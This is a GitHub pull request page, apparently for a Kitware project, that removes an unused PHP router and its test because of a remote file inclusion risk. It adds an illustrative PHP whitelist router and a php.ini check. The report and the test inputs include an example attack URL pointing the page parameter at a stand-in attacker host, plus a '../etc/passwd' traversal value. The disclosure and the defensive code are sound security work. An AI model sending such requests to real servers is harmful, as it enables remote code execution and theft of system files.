Remove router.php and tests/test_router.php. #141

Merged
merged 1 commit into from Nov 2, 2015

ghost commented Nov 2, 2015

They are not currently used and contain dangerous code that is vulnerable
to remote code execution if the default security of php.ini is reduced to
allow file_exists and include to retrieve additional URL-style protocols.

For example, an attacker could request:
https://domain/router.php?page=http://badguy/malicious
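
A router written so that the `page` value from the request never reaches `file_exists()` or `include` closes off the pattern reported above. This is an added example, not code from router.php or the project: the page map, file paths and function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical page map (assumption): request name => file shipped with the app.
const PAGES = [
    'index'   => 'pages/index.php',
    'project' => 'pages/project.php',
];

/**
 * Resolve a user-supplied page name to a local file, or null if not allowed.
 * The request value is used only as an array key, so a URL-style value can
 * never select a stream wrapper, whatever php.ini permits.
 */
function resolve_page(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // realpath() returns false for missing files; also confirm containment.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Report which URL-wrapper settings are enabled. allow_url_include is off by
 * default and only takes effect when allow_url_fopen is also on.
 */
function enabled_url_wrapper_settings(): array
{
    $enabled = [];
    foreach (['allow_url_include', 'allow_url_fopen'] as $key) {
        if (filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN)) {
            $enabled[] = $key;
        }
    }
    return $enabled;
}

// Constructed inputs, including the URL-style value from the report above.
// 'index' resolves only if pages/index.php exists next to this script.
foreach (['index', 'http://badguy/malicious', '../etc/passwd'] as $input) {
    printf("%-26s => %s\n", $input, resolve_page($input, __DIR__) ?? 'rejected');
}
printf("enabled: %s\n", implode(', ', enabled_url_wrapper_settings()) ?: 'none');
```

A caller would include the returned path only when it is non-null and answer with a 404 otherwise.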

zackgalbreath commented Nov 2, 2015

Thanks for bringing this to our attention. @jjomier any concerns before I merge this PR?

zackgalbreath added a commit that referenced this pull request Nov 2, 2015

Merge pull request #141 from ls--/master
Remove router.php and tests/test_router.php.

@zackgalbreath zackgalbreath merged commit 7f6cd35 into Kitware:master Nov 2, 2015

1 of 2 checks passed

ci/circleci Your tests failed
StyleCI The StyleCI analysis has passed